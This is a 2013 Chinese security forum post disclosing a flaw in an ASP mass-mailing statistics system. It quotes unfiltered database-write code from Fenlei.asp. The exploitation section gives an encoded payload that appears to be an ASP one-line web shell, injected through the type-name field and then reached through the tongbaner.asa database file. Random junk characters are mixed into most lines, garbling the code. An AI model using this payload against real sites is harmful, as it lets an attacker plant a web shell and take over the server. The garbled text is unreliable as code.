找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1973|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
5 A2 E1 ~) C5 C! i0 H. K0 d; o: H
" e# v, T3 H! b' }5 C9 L5 gIF Request.QueryString("Action")="del" Then ( ~$ t! X  F3 W6 |
ID=Request.QueryString("ID") 5 V- l6 V+ N" O! g4 Z/ t7 A) U0 L
IF Countss ("tui","Fenlei",ID )<>0 then 4 I0 o- J3 F' }6 ?) w& p
'略
! x5 h2 k9 I* p; XIF Request.QueryString("Action")="Add" Then
! _+ A* C. D5 S# h  V& B, a7 ]Tname=Request.Form("Typename") 1 g$ B: z& H2 i2 w& S* R  ~8 D! J3 ^$ @
Set Rs=Server.CreateObject("adodb.Recordset") + W3 _) D/ [$ z$ z8 T& y
Sql="Select * From Fenlei Order by id Desc "
1 b6 B/ t8 B# d8 h$ `7 I  aRs.Open Sql,Conn,1,3 $ r; ?* j- f1 T' l' {
Rs.Addnew - X  O/ c. v/ r, M
Rs("Typename")=Tname , j* ^" N; ~9 W* t* R! N
'略
/ |; f" v: V# J  G. CSet Rs=Server.CreateObject("adodb.Recordset")
0 O8 L; V4 Y# b2 I* _- @# a! kSql="Select * From Fenlei Order by id Desc " 4 j+ g( o  [9 d8 P+ z5 P# e
Rs.Open Sql,Conn,1,1 ' O: G! Y9 ]( N$ @8 [* Y
'略 ( f+ f4 x/ @4 I% l
%>
# w% F( O+ n5 Q1 S; d* n+ M; M
) k4 Q: C6 _! v1 T# U3 X * i7 C5 Q, A5 M

6 q5 Y9 p9 |& {# v; B7 x, ~  D没有过滤,直接写入数据库。3 Z9 z4 p, Z( M
' o) U/ |1 w0 ?( _, H
利用方法:
1 C8 J. E0 L# u! p; W
5 x/ w% _4 C' @' M- O插入:┼攠數畣整爠煥敵瑳∨≡┩>
: F8 g+ a9 o1 G& F 8 _3 R/ h- H7 o& @: H, g
6 \/ c7 D. c1 I* P# \- R
连接: http://www.xxx.com/###tongbaner.asa
" r6 t( {; F- c3 e. U7 d3 @' j'默认安装文件: + g  n. g  [4 B6 Z
'install.asp* a7 h) Y' [( e: K0 j! [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表